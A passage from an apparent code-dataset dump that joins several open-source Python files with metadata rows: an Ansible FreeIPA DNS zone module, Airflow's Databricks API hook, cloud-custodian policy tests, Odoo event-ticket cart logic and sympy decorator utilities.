client.dnszone_del(zone_name=zone_name)
return changed, client.dnszone_find(zone_name)
def main():
module = AnsibleModule(
argument_spec=dict(
zone_name=dict(type='str', required=True),
ipa_prot=dict(
type='str',
default='https',
choices=['http', 'https']
),
ipa_host=dict(
type='str',
default='localhost'
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
),
ipa_port=dict(type='int', default=443),
ipa_user=dict(type='str', default='admin'),
ipa_pass=dict(type='str', required=True, no_log=True),
validate_certs=dict(type='bool', default=True),
),
supports_check_mode=True,
)
client = DNSZoneIPAClient(
module=module,
host=module.params['ipa_host'],
port=module.params['ipa_port'],
protocol=module.params['ipa_prot']
)
try:
client.login(
username=module.params['ipa_user'],
password=module.params['ipa_pass']
)
changed, zone = ensure(module, client)
module.exit_json(changed=changed, zone=zone)
except Exception as e:
module.fail_json(msg=to_native(e))
if __name__ == '__main__':
main()
| gpl-3.0 | 729,071,680,670,470,300 | 26.401099 | 103 | 0.602767 | false |
mrares/incubator-airflow | airflow/contrib/hooks/databricks_hook.py | 16 | 8287 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import requests
from airflow import __version__
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from requests import exceptions as requests_exceptions
from requests.auth import AuthBase
from airflow.utils.log.logging_mixin import LoggingMixin
try:
from urllib import parse as urlparse
except ImportError:
import urlparse
SUBMIT_RUN_ENDPOINT = ('POST', 'api/2.0/jobs/runs/submit')
GET_RUN_ENDPOINT = ('GET', 'api/2.0/jobs/runs/get')
CANCEL_RUN_ENDPOINT = ('POST', 'api/2.0/jobs/runs/cancel')
USER_AGENT_HEADER = {'user-agent': 'airflow-{v}'.format(v=__version__)}
class DatabricksHook(BaseHook, LoggingMixin):
"""
Interact with Databricks.
"""
def __init__(
self,
databricks_conn_id='databricks_default',
timeout_seconds=180,
retry_limit=3):
"""
:param databricks_conn_id: The name of the databricks connection to use.
:type databricks_conn_id: string
:param timeout_seconds: The amount of time in seconds the requests library
will wait before timing-out.
:type timeout_seconds: int
:param retry_limit: The number of times to retry the connection in case of
service outages.
:type retry_limit: int
"""
self.databricks_conn_id = databricks_conn_id
self.databricks_conn = self.get_connection(databricks_conn_id)
self.timeout_seconds = timeout_seconds
        assert retry_limit >= 1, 'Retry limit must be greater than or equal to 1'
self.retry_limit = retry_limit
def _parse_host(self, host):
"""
The purpose of this function is to be robust to improper connections
settings provided by users, specifically in the host field.
For example -- when users supply ``https://xx.cloud.databricks.com`` as the
host, we must strip out the protocol to get the host.
>>> h = DatabricksHook()
>>> assert h._parse_host('https://xx.cloud.databricks.com') == \
'xx.cloud.databricks.com'
In the case where users supply the correct ``xx.cloud.databricks.com`` as the
host, this function is a no-op.
>>> assert h._parse_host('xx.cloud.databricks.com') == 'xx.cloud.databricks.com'
"""
urlparse_host = urlparse.urlparse(host).hostname
if urlparse_host:
# In this case, host = https://xx.cloud.databricks.com
return urlparse_host
else:
# In this case, host = xx.cloud.databricks.com
return host
def _do_api_call(self, endpoint_info, json):
"""
Utility function to perform an API call with retries
:param endpoint_info: Tuple of method and endpoint
:type endpoint_info: (string, string)
:param json: Parameters for this API call.
:type json: dict
:return: If the api call returns a OK status code,
this function returns the response in JSON. Otherwise,
we throw an AirflowException.
:rtype: dict
"""
method, endpoint = endpoint_info
url = 'https://{host}/{endpoint}'.format(
host=self._parse_host(self.databricks_conn.host),
endpoint=endpoint)
if 'token' in self.databricks_conn.extra_dejson:
self.log.info('Using token auth.')
auth = _TokenAuth(self.databricks_conn.extra_dejson['token'])
else:
self.log.info('Using basic auth.')
auth = (self.databricks_conn.login, self.databricks_conn.password)
if method == 'GET':
request_func = requests.get
elif method == 'POST':
request_func = requests.post
else:
raise AirflowException('Unexpected HTTP Method: ' + method)
for attempt_num in range(1, self.retry_limit+1):
try:
response = request_func(
url,
json=json,
auth=auth,
headers=USER_AGENT_HEADER,
timeout=self.timeout_seconds)
if response.status_code == requests.codes.ok:
return response.json()
else:
# In this case, the user probably made a mistake.
# Don't retry.
raise AirflowException('Response: {0}, Status Code: {1}'.format(
response.content, response.status_code))
except (requests_exceptions.ConnectionError,
requests_exceptions.Timeout) as e:
self.log.error(
'Attempt %s API Request to Databricks failed with reason: %s',
attempt_num, e
)
raise AirflowException(('API requests to Databricks failed {} times. ' +
'Giving up.').format(self.retry_limit))
def submit_run(self, json):
"""
Utility function to call the ``api/2.0/jobs/runs/submit`` endpoint.
:param json: The data used in the body of the request to the ``submit`` endpoint.
:type json: dict
:return: the run_id as a string
:rtype: string
"""
response = self._do_api_call(SUBMIT_RUN_ENDPOINT, json)
return response['run_id']
def get_run_page_url(self, run_id):
json = {'run_id': run_id}
response = self._do_api_call(GET_RUN_ENDPOINT, json)
return response['run_page_url']
def get_run_state(self, run_id):
json = {'run_id': run_id}
response = self._do_api_call(GET_RUN_ENDPOINT, json)
state = response['state']
life_cycle_state = state['life_cycle_state']
# result_state may not be in the state if not terminal
result_state = state.get('result_state', None)
state_message = state['state_message']
return RunState(life_cycle_state, result_state, state_message)
def cancel_run(self, run_id):
json = {'run_id': run_id}
self._do_api_call(CANCEL_RUN_ENDPOINT, json)
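# Illustrative polling sketch (added; the connection id and notebook task
# below are hypothetical, not part of Airflow, and it assumes `import time`):
#
#     hook = DatabricksHook(databricks_conn_id='my_databricks_conn')
#     run_id = hook.submit_run({
#         'new_cluster': {'spark_version': '2.1.0-db3-scala2.11',
#                         'node_type_id': 'r3.xlarge',
#                         'num_workers': 1},
#         'notebook_task': {'notebook_path': '/Users/someone/notebook'},
#     })
#     while not hook.get_run_state(run_id).is_terminal:
#         time.sleep(30)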
RUN_LIFE_CYCLE_STATES = [
'PENDING',
'RUNNING',
'TERMINATING',
'TERMINATED',
'SKIPPED',
'INTERNAL_ERROR'
]
class RunState:
"""
Utility class for the run state concept of Databricks runs.
"""
def __init__(self, life_cycle_state, result_state, state_message):
self.life_cycle_state = life_cycle_state
self.result_state = result_state
self.state_message = state_message
@property
def is_terminal(self):
if self.life_cycle_state not in RUN_LIFE_CYCLE_STATES:
raise AirflowException(('Unexpected life cycle state: {}: If the state has '
'been introduced recently, please check the Databricks user '
'guide for troubleshooting information').format(
self.life_cycle_state))
return self.life_cycle_state in ('TERMINATED', 'SKIPPED', 'INTERNAL_ERROR')
@property
def is_successful(self):
return self.result_state == 'SUCCESS'
def __eq__(self, other):
return self.life_cycle_state == other.life_cycle_state and \
self.result_state == other.result_state and \
self.state_message == other.state_message
def __repr__(self):
return str(self.__dict__)
class _TokenAuth(AuthBase):
"""
Helper class for requests Auth field. AuthBase requires you to implement the __call__
magic function.
"""
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = 'Bearer ' + self.token
return r
| apache-2.0 | 1,151,514,850,815,017,200 | 36.328829 | 89 | 0.603596 | false |
scotwk/cloud-custodian | tests/test_policy.py | 2 | 21345 | # Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, timedelta
import json
import mock
import shutil
import tempfile
from c7n import policy, manager
from c7n.resources.ec2 import EC2
from c7n.utils import dumps
from c7n.query import ConfigSource
from .common import BaseTest, Config, Bag, event_data
class DummyResource(manager.ResourceManager):
def resources(self):
return [
{'abc': 123},
{'def': 456}]
@property
def actions(self):
class _a(object):
def name(self):
return self.f.__name__
def __init__(self, f):
self.f = f
def process(self, resources):
return self.f(resources)
def p1(resources):
return [
{'abc': 456},
{'def': 321}]
def p2(resources):
return resources
return [_a(p1), _a(p2)]
class PolicyPermissions(BaseTest):
def test_policy_detail_spec_permissions(self):
policy = self.load_policy({
'name': 'kinesis-delete',
'resource': 'kinesis',
'actions': ['delete']})
perms = policy.get_permissions()
self.assertEqual(
perms,
set(('kinesis:DescribeStream',
'kinesis:ListStreams',
'kinesis:DeleteStream')))
def test_policy_manager_custom_permissions(self):
policy = self.load_policy({
'name': 'ec2-utilization',
'resource': 'ec2',
'filters': [
{'type': 'metrics',
'name': 'CPUUtilization',
'days': 3,
'value': 1.5}
]})
perms = policy.get_permissions()
self.assertEqual(
perms,
set(('ec2:DescribeInstances',
'ec2:DescribeTags',
'cloudwatch:GetMetricStatistics')))
def xtest_resource_filter_name(self):
# resources without a filter name won't play nice in
# lambda policies
missing = []
marker = object
for k, v in manager.resources.items():
if getattr(v.resource_type, 'filter_name', marker) is marker:
missing.append(k)
if missing:
self.fail("Missing filter name %s" % (', '.join(missing)))
def test_resource_augment_universal_mask(self):
        # The universal tag augmentation had a potential bad pattern of
        # masking resource augmentation; scan resources to ensure it doesn't.
for k, v in manager.resources.items():
if not getattr(v.resource_type, 'universal_taggable', None):
continue
if v.augment.__name__ == 'universal_augment' and getattr(
v.resource_type, 'detail_spec', None):
self.fail(
"%s resource has universal augment masking resource augment" % k)
def test_resource_shadow_source_augment(self):
shadowed = []
bad = []
cfg = Config.empty()
for k, v in manager.resources.items():
if not getattr(v.resource_type, 'config_type', None):
continue
p = Bag({'name': 'permcheck', 'resource': k})
ctx = self.get_context(config=cfg, policy=p)
mgr = v(ctx, p)
source = mgr.get_source('config')
if not isinstance(source, ConfigSource):
bad.append(k)
if v.__dict__.get('augment'):
shadowed.append(k)
if shadowed:
self.fail(
"%s have resource managers shadowing source augments" % (
", ".join(shadowed)))
if bad:
self.fail(
"%s have config types but no config source" % (
", ".join(bad)))
def test_resource_permissions(self):
self.capture_logging('c7n.cache')
missing = []
cfg = Config.empty()
for k, v in manager.resources.items():
p = Bag({'name': 'permcheck', 'resource': k})
ctx = self.get_context(config=cfg, policy=p)
mgr = v(ctx, p)
perms = mgr.get_permissions()
if not perms:
missing.append(k)
for n, a in v.action_registry.items():
p['actions'] = [n]
perms = a({}, mgr).get_permissions()
found = bool(perms)
if not isinstance(perms, (list, tuple, set)):
found = False
if not found:
missing.append("%s.actions.%s" % (
k, n))
for n, f in v.filter_registry.items():
if n in ('and', 'or', 'not'):
continue
p['filters'] = [n]
perms = f({}, mgr).get_permissions()
if not isinstance(perms, (tuple, list, set)):
missing.append("%s.filters.%s" % (
k, n))
# in memory filters
if n in ('event', 'value', 'tag-count',
'marked-for-op', 'offhour', 'onhour', 'age',
'state-age', 'egress', 'ingress',
'capacity-delta', 'is-ssl', 'global-grants',
'missing-policy-statement', 'missing-statement',
'healthcheck-protocol-mismatch', 'image-age',
'has-statement', 'no-access',
'instance-age', 'ephemeral', 'instance-uptime'):
continue
qk = "%s.filters.%s" % (k, n)
if qk in ('route-table.filters.route',):
continue
if not perms:
missing.append(qk)
if missing:
self.fail("Missing permissions %d on \n\t%s" % (
len(missing),
"\n\t".join(sorted(missing))))
class TestPolicyCollection(BaseTest):
def test_expand_partitions(self):
cfg = Config.empty(
regions=['us-gov-west-1', 'cn-north-1', 'us-west-2'])
original = policy.PolicyCollection.from_data(
{'policies': [
{'name': 'foo',
'resource': 'ec2'}]},
cfg)
collection = original.expand_regions(cfg.regions)
self.assertEqual(
sorted([p.options.region for p in collection]),
['cn-north-1', 'us-gov-west-1', 'us-west-2'])
def test_policy_account_expand(self):
original = policy.PolicyCollection.from_data(
{'policies': [
{'name': 'foo',
'resource': 'account'}]},
Config.empty(regions=['us-east-1', 'us-west-2']))
collection = original.expand_regions(['all'])
self.assertEqual(len(collection), 1)
def test_policy_region_expand_global(self):
original = policy.PolicyCollection.from_data(
{'policies': [
{'name': 'foo',
'resource': 's3'},
{'name': 'iam',
'resource': 'iam-user'}]},
Config.empty(regions=['us-east-1', 'us-west-2']))
collection = original.expand_regions(['all'])
self.assertEqual(len(collection.resource_types), 2)
s3_regions = [p.options.region for p in collection if p.resource_type == 's3']
self.assertTrue('us-east-1' in s3_regions)
self.assertTrue('us-east-2' in s3_regions)
iam = [p for p in collection if p.resource_type == 'iam-user']
self.assertEqual(len(iam), 1)
self.assertEqual(iam[0].options.region, 'us-east-1')
collection = original.expand_regions(['eu-west-1', 'eu-west-2'])
iam = [p for p in collection if p.resource_type == 'iam-user']
self.assertEqual(len(iam), 1)
self.assertEqual(iam[0].options.region, 'eu-west-1')
self.assertEqual(len(collection), 3)
class TestPolicy(BaseTest):
def test_child_resource_trail_validation(self):
self.assertRaises(
ValueError,
self.load_policy,
{'name': 'api-resources',
'resource': 'rest-resource',
'mode': {
'type': 'cloudtrail',
'events': [
{'source': 'apigateway.amazonaws.com',
'event': 'UpdateResource',
'ids': 'requestParameter.stageName'}]}})
def test_load_policy_validation_error(self):
invalid_policies = {
'policies':
[{
'name': 'foo',
'resource': 's3',
'filters': [{"tag:custodian_tagging": "not-null"}],
'actions': [{'type': 'untag',
'tags': {'custodian_cleanup': 'yes'}}],
}]
}
self.assertRaises(Exception, self.load_policy_set, invalid_policies)
def test_policy_validation(self):
policy = self.load_policy({
'name': 'ec2-utilization',
'resource': 'ec2',
'tags': ['abc'],
'filters': [
{'type': 'metrics',
'name': 'CPUUtilization',
'days': 3,
'value': 1.5}],
'actions': ['stop']})
policy.validate()
self.assertEqual(policy.tags, ['abc'])
self.assertFalse(policy.is_lambda)
self.assertTrue(
repr(policy).startswith(
"<Policy resource: ec2 name: ec2-utilization"))
def test_policy_name_filtering(self):
collection = self.load_policy_set(
{'policies': [
{'name': 's3-remediate',
'resource': 's3'},
{'name': 's3-global-grants',
'resource': 's3'},
{'name': 'ec2-tag-compliance-stop',
'resource': 'ec2'},
{'name': 'ec2-tag-compliance-kill',
'resource': 'ec2'},
{'name': 'ec2-tag-compliance-remove',
'resource': 'ec2'}]},
)
self.assertIn('s3-remediate', collection)
self.assertNotIn('s3-argle-bargle', collection)
# Make sure __iter__ works
for p in collection:
self.assertTrue(p.name is not None)
self.assertEqual(collection.resource_types, set(('s3', 'ec2')))
self.assertTrue('s3-remediate' in collection)
self.assertEqual(
[p.name for p in collection.filter('s3*')],
['s3-remediate', 's3-global-grants'])
self.assertEqual(
[p.name for p in collection.filter('ec2*')],
['ec2-tag-compliance-stop',
'ec2-tag-compliance-kill',
'ec2-tag-compliance-remove'])
def test_file_not_found(self):
self.assertRaises(
IOError, policy.load, Config.empty(), "/asdf12")
def test_lambda_policy_metrics(self):
session_factory = self.replay_flight_data('test_lambda_policy_metrics')
p = self.load_policy({
'name': 'ec2-tag-compliance-v6',
'resource': 'ec2',
'mode': {
'type': 'ec2-instance-state',
'events': ['running']},
'filters': [
{"tag:custodian_status": 'absent'},
{'or': [
{"tag:App": 'absent'},
{"tag:Env": 'absent'},
{"tag:Owner": 'absent'}]}]},
session_factory=session_factory)
end = datetime.utcnow()
start = end - timedelta(14)
period = 24 * 60 * 60 * 14
self.assertEqual(
json.loads(dumps(p.get_metrics(start, end, period), indent=2)),
{u'Durations': [],
u'Errors': [{u'Sum': 0.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}],
u'Invocations': [{u'Sum': 4.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}],
u'ResourceCount': [{u'Average': 1.0,
u'Sum': 2.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}],
u'Throttles': [{u'Sum': 0.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}]})
def test_policy_metrics(self):
session_factory = self.replay_flight_data('test_policy_metrics')
p = self.load_policy(
{'name': 's3-encrypt-keys',
'resource': 's3',
'actions': [
{'type': 'encrypt-keys'}]},
session_factory=session_factory)
end = datetime.now().replace(hour=0, minute=0, microsecond=0)
start = end - timedelta(14)
period = 24 * 60 * 60 * 14
self.maxDiff = None
self.assertEqual(
json.loads(dumps(p.get_metrics(start, end, period), indent=2)),
{
"ActionTime": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 8541.752702140668,
"Sum": 128126.29053211001,
"Unit": "Seconds"
}
],
"Total Keys": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 1575708.7333333334,
"Sum": 23635631.0,
"Unit": "Count"
}
],
"ResourceTime": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 8.682969363532667,
"Sum": 130.24454045299,
"Unit": "Seconds"
}
],
"ResourceCount": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 23.6,
"Sum": 354.0,
"Unit": "Count"
}
],
"Unencrypted": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 10942.266666666666,
"Sum": 164134.0,
"Unit": "Count"
}
]})
def test_get_resource_manager(self):
collection = self.load_policy_set(
{'policies': [
{'name': 'query-instances',
'resource': 'ec2',
'filters': [
{'tag-key': 'CMDBEnvironment'}
]}]})
p = collection.policies[0]
self.assertTrue(
isinstance(p.get_resource_manager(), EC2))
def test_get_logs_from_group(self):
p_data = {
'name': 'related-rds-test',
'resource': 'rds',
'filters': [
{
'key': 'GroupName',
'type': 'security-group',
'value': 'default',
},
],
'actions': [{'days': 10, 'type': 'retention'}],
}
session_factory = self.replay_flight_data('test_logs_from_group')
config = {'log_group': 'test-logs'}
policy = self.load_policy(p_data, config, session_factory)
logs = list(
policy.get_logs('2016-11-01 00:00:00', '2016-11-30 11:59:59')
)
self.assertEqual(len(logs), 6)
# entries look reasonable
entry = logs[1]
self.assertIn('timestamp', entry)
self.assertIn('message', entry)
# none in range
logs = list(
policy.get_logs('2016-10-01 00:00:00', '2016-10-31 11:59:59')
)
self.assertEqual(len(logs), 0)
def xtest_policy_run(self):
manager.resources.register('dummy', DummyResource)
self.addCleanup(manager.resources.unregister, 'dummy')
self.output_dir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.output_dir)
collection = self.load_policy_set(
{'policies': [
{'name': 'process-instances',
'resource': 'dummy'}]},
{'output_dir': self.output_dir})
p = collection.policies[0]
p()
self.assertEqual(len(p.ctx.metrics.data), 3)
class PolicyExecutionModeTest(BaseTest):
def test_run_unimplemented(self):
self.assertRaises(NotImplementedError,
policy.PolicyExecutionMode({}).run)
def test_get_logs_unimplemented(self):
self.assertRaises(NotImplementedError,
policy.PolicyExecutionMode({}).get_logs, 1, 2)
class PullModeTest(BaseTest):
def test_skip_when_region_not_equal(self):
log_file = self.capture_logging('custodian.policy')
policy_name = 'rds-test-policy'
p = self.load_policy(
{'name': policy_name,
'resource': 'rds',
'region': 'us-east-1',
'filters': [
{'type': 'default-vpc'}]},
config={'region': 'us-west-2'},
session_factory=None)
p.run()
lines = log_file.getvalue().strip().split('\n')
self.assertIn(
"Skipping policy {} target-region: us-east-1 current-region: us-west-2".format(policy_name),
lines)
class GuardModeTest(BaseTest):
def test_unsupported_resource(self):
self.assertRaises(
ValueError,
self.load_policy,
{'name': 'vpc',
'resource': 'vpc',
'mode': {'type': 'guard-duty'}},
validate=True)
@mock.patch('c7n.mu.LambdaManager.publish')
def test_ec2_guard_event_pattern(self, publish):
def assert_publish(policy_lambda, alias, role):
events = policy_lambda.get_events(mock.MagicMock())
self.assertEqual(len(events), 1)
pattern = json.loads(events[0].render_event_pattern())
expected = {"source": ["aws.guardduty"],
"detail": {"resource": {"resourceType": ["Instance"]}},
"detail-type": ["GuardDuty Finding"]}
self.assertEqual(pattern, expected)
publish.side_effect = assert_publish
p = self.load_policy(
{'name': 'ec2-instance-guard',
'resource': 'ec2',
'mode': {'type': 'guard-duty'}})
p.run()
@mock.patch('c7n.mu.LambdaManager.publish')
def test_iam_guard_event_pattern(self, publish):
def assert_publish(policy_lambda, alias, role):
events = policy_lambda.get_events(mock.MagicMock())
self.assertEqual(len(events), 1)
pattern = json.loads(events[0].render_event_pattern())
expected = {"source": ["aws.guardduty"],
"detail": {"resource": {"resourceType": ["AccessKey"]}},
"detail-type": ["GuardDuty Finding"]}
self.assertEqual(pattern, expected)
publish.side_effect = assert_publish
p = self.load_policy(
{'name': 'iam-user-guard',
'resource': 'iam-user',
'mode': {'type': 'guard-duty'}})
p.run()
@mock.patch('c7n.query.QueryResourceManager.get_resources')
def test_ec2_instance_guard(self, get_resources):
def instances(ids, cache=False):
return [{'InstanceId': ids[0]}]
get_resources.side_effect = instances
p = self.load_policy(
{'name': 'ec2-instance-guard',
'resource': 'ec2',
'mode': {'type': 'guard-duty'}})
event = event_data('ec2-duty-event.json')
results = p.push(event, None)
self.assertEqual(results, [{'InstanceId': 'i-99999999'}])
@mock.patch('c7n.query.QueryResourceManager.get_resources')
def test_iam_user_access_key_annotate(self, get_resources):
def users(ids, cache=False):
return [{'UserName': ids[0]}]
get_resources.side_effect = users
p = self.load_policy(
{'name': 'user-key-guard',
'resource': 'iam-user',
'mode': {'type': 'guard-duty'}})
event = event_data('iam-duty-event.json')
results = p.push(event, None)
self.assertEqual(results, [{
u'UserName': u'GeneratedFindingUserName',
u'c7n:AccessKeys': {u'AccessKeyId': u'GeneratedFindingAccessKeyId'}}])
| apache-2.0 | 2,344,467,737,883,790,300 | 34.39801 | 104 | 0.495573 | false |
akhmadMizkat/odoo | addons/website_event_sale/models/sale_order.py | 1 | 5121 | # -*- coding: utf-8 -*-
from openerp import SUPERUSER_ID, api
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.exceptions import UserError
class sale_order(osv.Model):
_inherit = "sale.order"
@api.multi
def _cart_find_product_line(self, product_id=None, line_id=None, **kwargs):
self.ensure_one()
lines = super(sale_order, self)._cart_find_product_line(product_id, line_id)
if line_id:
return lines
if self.env.context.get("event_ticket_id"):
lines = lines.filtered(lambda line: line.event_ticket_id.id == self.env.context["event_ticket_id"])
return lines
def _website_product_id_change(self, cr, uid, ids, order_id, product_id, qty=0, context=None):
values = super(sale_order, self)._website_product_id_change(cr, uid, ids, order_id, product_id, qty=qty, context=None)
event_ticket_id = None
if context.get("event_ticket_id"):
event_ticket_id = context.get("event_ticket_id")
else:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
if product.event_ticket_ids:
event_ticket_id = product.event_ticket_ids[0].id
if event_ticket_id:
order = self.pool['sale.order'].browse(cr, SUPERUSER_ID, order_id, context=context)
ticket = self.pool.get('event.event.ticket').browse(cr, uid, event_ticket_id, context=dict(context, pricelist=order.pricelist_id.id))
if product_id != ticket.product_id.id:
raise UserError(_("The ticket doesn't match with this product."))
values['product_id'] = ticket.product_id.id
values['event_id'] = ticket.event_id.id
values['event_ticket_id'] = ticket.id
values['price_unit'] = ticket.price_reduce or ticket.price
values['name'] = "%s\n%s" % (ticket.event_id.display_name, ticket.name)
# avoid writing related values that end up locking the product record
values.pop('event_type_id', None)
values.pop('event_ok', None)
return values
def _cart_update(self, cr, uid, ids, product_id=None, line_id=None, add_qty=0, set_qty=0, context=None, **kwargs):
OrderLine = self.pool['sale.order.line']
Attendee = self.pool['event.registration']
Ticket = self.pool['event.event.ticket']
if line_id:
line = OrderLine.browse(cr, uid, line_id, context=context)
ticket = line.event_ticket_id
old_qty = int(line.product_uom_qty)
context = dict(context, event_ticket_id=ticket.id)
else:
line, ticket = None, None
ticket_ids = Ticket.search(cr, uid, [('product_id', '=', product_id)], limit=1, context=context)
if ticket_ids:
ticket = Ticket.browse(cr, uid, ticket_ids[0], context=context)
old_qty = 0
        new_qty = set_qty if set_qty else ((add_qty or 0) + old_qty)
# case: buying tickets for a sold out ticket
values = {}
if ticket and ticket.seats_availability == 'limited' and ticket.seats_available <= 0:
values['warning'] = _('Sorry, The %(ticket)s tickets for the %(event)s event are sold out.') % {
'ticket': ticket.name,
'event': ticket.event_id.name}
new_qty, set_qty, add_qty = 0, 0, 0
# case: buying tickets, too much attendees
elif ticket and ticket.seats_availability == 'limited' and new_qty > ticket.seats_available:
values['warning'] = _('Sorry, only %(remaining_seats)d seats are still available for the %(ticket)s ticket for the %(event)s event.') % {
'remaining_seats': ticket.seats_available,
'ticket': ticket.name,
'event': ticket.event_id.name}
new_qty, set_qty, add_qty = ticket.seats_available, ticket.seats_available, 0
values.update(super(sale_order, self)._cart_update(
cr, uid, ids, product_id, line_id, add_qty, set_qty, context, **kwargs))
# removing attendees
if ticket and new_qty < old_qty:
attendees = Attendee.search(
cr, uid, [
('state', '!=', 'cancel'),
('sale_order_id', '=', ids[0]),
('event_ticket_id', '=', ticket.id)
], offset=new_qty, limit=(old_qty-new_qty),
order='create_date asc', context=context)
Attendee.button_reg_cancel(cr, uid, attendees, context=context)
# adding attendees
elif ticket and new_qty > old_qty:
line = OrderLine.browse(cr, uid, values['line_id'], context=context)
line._update_registrations(confirm=False, registration_data=kwargs.get('registration_data', []))
# add in return values the registrations, to display them on website (or not)
values['attendee_ids'] = Attendee.search(cr, uid, [('sale_order_line_id', '=', line.id), ('state', '!=', 'cancel')], context=context)
return values
| gpl-3.0 | 4,871,151,628,124,415,000 | 48.718447 | 149 | 0.59422 | false |
jaimahajan1997/sympy | sympy/utilities/decorator.py | 17 | 6353 | """Useful utility decorators. """
from __future__ import print_function, division
import sys
import types
import inspect
from functools import update_wrapper
from sympy.core.decorators import wraps
from sympy.core.compatibility import class_types, get_function_globals, get_function_name, iterable
def threaded_factory(func, use_add):
"""A factory for ``threaded`` decorators. """
from sympy.core import sympify
from sympy.matrices import MatrixBase
@wraps(func)
def threaded_func(expr, *args, **kwargs):
if isinstance(expr, MatrixBase):
return expr.applyfunc(lambda f: func(f, *args, **kwargs))
elif iterable(expr):
try:
return expr.__class__([func(f, *args, **kwargs) for f in expr])
except TypeError:
return expr
else:
expr = sympify(expr)
if use_add and expr.is_Add:
return expr.__class__(*[ func(f, *args, **kwargs) for f in expr.args ])
elif expr.is_Relational:
return expr.__class__(func(expr.lhs, *args, **kwargs),
func(expr.rhs, *args, **kwargs))
else:
return func(expr, *args, **kwargs)
return threaded_func
def threaded(func):
"""Apply ``func`` to sub--elements of an object, including :class:`Add`.
This decorator is intended to make it uniformly possible to apply a
function to all elements of composite objects, e.g. matrices, lists, tuples
and other iterable containers, or just expressions.
This version of :func:`threaded` decorator allows threading over
elements of :class:`Add` class. If this behavior is not desirable
use :func:`xthreaded` decorator.
Functions using this decorator must have the following signature::
@threaded
def function(expr, *args, **kwargs):
"""
return threaded_factory(func, True)
def xthreaded(func):
"""Apply ``func`` to sub--elements of an object, excluding :class:`Add`.
This decorator is intended to make it uniformly possible to apply a
function to all elements of composite objects, e.g. matrices, lists, tuples
and other iterable containers, or just expressions.
This version of :func:`threaded` decorator disallows threading over
elements of :class:`Add` class. If this behavior is not desirable
use :func:`threaded` decorator.
Functions using this decorator must have the following signature::
@xthreaded
def function(expr, *args, **kwargs):
"""
return threaded_factory(func, False)
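# Illustrative sketch (editor's addition, not part of the original module): shows the
# practical difference between ``threaded`` and ``xthreaded`` on an Add expression.
# The name ``_demo_threading`` is hypothetical and exists only for this example.
def _demo_threading():
    from sympy.abc import x, y
    @threaded
    def over_terms(expr, n):
        return expr + n
    @xthreaded
    def over_whole(expr, n):
        return expr + n
    # threaded maps over the terms of the Add: (x + y) -> (x + 1) + (y + 1)
    assert over_terms(x + y, 1) == x + y + 2
    # xthreaded treats the Add as a single object: (x + y) -> x + y + 1
    assert over_whole(x + y, 1) == x + y + 1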
def conserve_mpmath_dps(func):
"""After the function finishes, resets the value of mpmath.mp.dps to
the value it had before the function was run."""
import functools
import mpmath
def func_wrapper(*args, **kwargs):
dps = mpmath.mp.dps
try:
return func(*args, **kwargs)
finally:
mpmath.mp.dps = dps
func_wrapper = functools.update_wrapper(func_wrapper, func)
return func_wrapper
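# Illustrative sketch (editor's addition, not part of the original module): the wrapped
# function may raise mpmath's working precision; the decorator restores the caller's
# mp.dps afterwards. ``_demo_high_precision_pi`` is a hypothetical example name.
@conserve_mpmath_dps
def _demo_high_precision_pi():
    import mpmath
    mpmath.mp.dps = 50   # raise precision inside this call only
    return +mpmath.pi    # evaluated with 50 digits; mp.dps is reset on return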
class no_attrs_in_subclass(object):
"""Don't 'inherit' certain attributes from a base class
>>> from sympy.utilities.decorator import no_attrs_in_subclass
>>> class A(object):
... x = 'test'
>>> A.x = no_attrs_in_subclass(A, A.x)
>>> class B(A):
... pass
>>> hasattr(A, 'x')
True
>>> hasattr(B, 'x')
False
"""
def __init__(self, cls, f):
self.cls = cls
self.f = f
def __get__(self, instance, owner=None):
if owner == self.cls:
if hasattr(self.f, '__get__'):
return self.f.__get__(instance, owner)
return self.f
raise AttributeError
def doctest_depends_on(exe=None, modules=None, disable_viewers=None):
"""Adds metadata about the depenencies which need to be met for doctesting
the docstrings of the decorated objects."""
pyglet = False
if modules is not None and 'pyglet' in modules:
pyglet = True
def depends_on_deco(fn):
fn._doctest_depends_on = dict(exe=exe, modules=modules,
disable_viewers=disable_viewers,
pyglet=pyglet)
# once we drop py2.5 support and use class decorators this evaluates
# to True
if inspect.isclass(fn):
            fn._doctest_depends_on = no_attrs_in_subclass(fn, fn._doctest_depends_on)
return fn
return depends_on_deco
def public(obj):
"""
Append ``obj``'s name to global ``__all__`` variable (call site).
By using this decorator on functions or classes you achieve the same goal
as by filling ``__all__`` variables manually, you just don't have to repeat
yourself (object's name). You also know if object is public at definition
site, not at some random location (where ``__all__`` was set).
Note that in multiple decorator setup (in almost all cases) ``@public``
decorator must be applied before any other decorators, because it relies
